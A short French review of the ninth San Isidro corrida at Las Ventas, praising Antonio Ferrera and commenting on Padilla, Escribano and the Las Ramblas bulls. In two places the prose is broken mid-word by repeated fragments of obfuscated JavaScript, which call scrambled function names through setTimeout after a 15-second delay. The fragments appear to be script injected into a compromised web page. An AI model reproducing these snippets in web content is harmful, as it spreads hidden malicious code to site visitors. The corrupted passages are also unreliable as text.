ANTONIO FERRERA AU SOMMET DE LA TAUROMACHIE

San Isidro. 9ème corrida. Si ce que fit Antonio Ferrera dans l’arène de Las Ventas avait été réalisé par Antonio Bienvenida, l’aficion serait encore en transe. Ce n’est pas rien que de toréer avec profondeur à mi hauteur un toro qui charge avec la tête relevée, en lui donnant de la distance pour que l’inertie de sa première charge sur trois passes supplémentaires, achever celles-ci toujours vers l’intérieur pour corriger leur manque de zèle, toréer très lentement un toro qui passe mais ne charge pas, rendre complice d’un toreo inspiré, fluide un toro indifférent, et le tuer d’une estocade sans puntilla. On a demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andé avec force les deux oreilles mais le président n’en a concédé qu’une seule, je ne sais pas si c’est parce qu’il est bête ou parce qu’il a peur que les talibans se fâchent.

Juan José Padilla endossa cinq « largas cambiadas » à son second toro. Il s’est justifié devant deux adversaires fades et sans race. Manuel Escribano reçut le sixième « a porta gayola ». Après, à la muleta, il a fait quelques passes belles et longues.

Les trois toreros ont bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderillé les six toros, les trois premiers ils l’ont fait ensemble. Ils ont été brillants.

La corrida de Las Ramblas fut bien présentée, certains toros étaient magnifiques, mais tous se sont comportés comme des mansos au cheval et n’ont pas eu la race suffisante pour aller plus loin à la muleta. Le Tendido 7 les a protestés, comme il proteste tout ce qui sort en piste.

Les commentaires sont fermés.